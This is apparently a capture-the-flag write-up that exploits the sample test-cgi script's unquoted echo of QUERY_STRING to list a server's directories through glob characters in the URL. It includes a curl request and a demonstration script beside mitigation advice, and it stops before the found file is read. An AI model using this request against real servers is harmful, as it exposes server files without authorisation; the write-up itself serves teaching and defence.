Sprinkler system - Web (100 + 0)
Damn new york… some chick tricked you into standing in the rain on the very first day… it’s payback time!
Starting by looking into robots.txt
We have a hidden directory `/cgi-bin/test-cgi`. My first instinct was to try Shellshock, but of course it didn't work, so after a while searching on Google I found this: http://insecure.org/sploits/test-cgi.server_protocol.html.
To list the root directory we can do this:
```
CGI/1.0 test script report:
argc is 1. argv is /*.
SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = */*
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = /app /bin /boot /dev /etc /git /home /lib /lib64 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
REMOTE_ADDR = 18.104.22.168
```
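Why the listing works: test-cgi echoes `$QUERY_STRING` without quotes, so the shell glob-expands a `*` in the query against the script's working directory before `echo` ever sees it. The script below is an added example, not the original test-cgi; it puts a minimal stand-in for that unquoted `echo` beside the quoted form and runs both in a constructed temporary directory (file names made up) so the difference is visible offline.

```shell
#!/bin/sh
# Added example: unquoted vs quoted expansion of QUERY_STRING, the defect
# behind the test-cgi directory listing. Not the original test-cgi script.

# Constructed sandbox directory standing in for cgi-bin (names are made up).
setup_sandbox() {
  SANDBOX=$(mktemp -d)
  : > "$SANDBOX/enable_sprinkler_system"
  : > "$SANDBOX/index.html"
  mkdir "$SANDBOX/sub"
}

# Vulnerable form: $QUERY_STRING is expanded unquoted, so word splitting and
# pathname expansion run on it. A query of "*" becomes the directory listing;
# "/*" would list the filesystem root the same way.
vulnerable_echo() {
  QUERY_STRING=$1
  ( cd "$SANDBOX" && echo QUERY_STRING = $QUERY_STRING )
}

# Hardened form: double quotes suppress splitting and globbing, so the query
# string is echoed back literally and the client learns nothing about the
# filesystem.
hardened_echo() {
  QUERY_STRING=$1
  ( cd "$SANDBOX" && echo "QUERY_STRING = $QUERY_STRING" )
}

setup_sandbox
trap 'rm -rf "$SANDBOX"' EXIT

echo "vulnerable: $(vulnerable_echo '*')"   # lists the sandbox files
echo "hardened:   $(hardened_echo '*')"     # prints the literal "*"
```

Quoting fixes the leak, but sample scripts like test-cgi have no business in a production cgi-bin at all; removing them is the simpler mitigation, and a web-server access log showing `test-cgi` requests with `*` or `?` in the query string is the signal to look for.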
Nothing special in the root directory. Let's list the current directory instead: rather than `?/*`, let's try `?*` at the end of the URL:

```
$ curl 'http://sprinklers.alieni.se/cgi-bin/test-cgi?*'
```
It works! There is a file named `enable_sprinkler_system`. Let's see what its content is: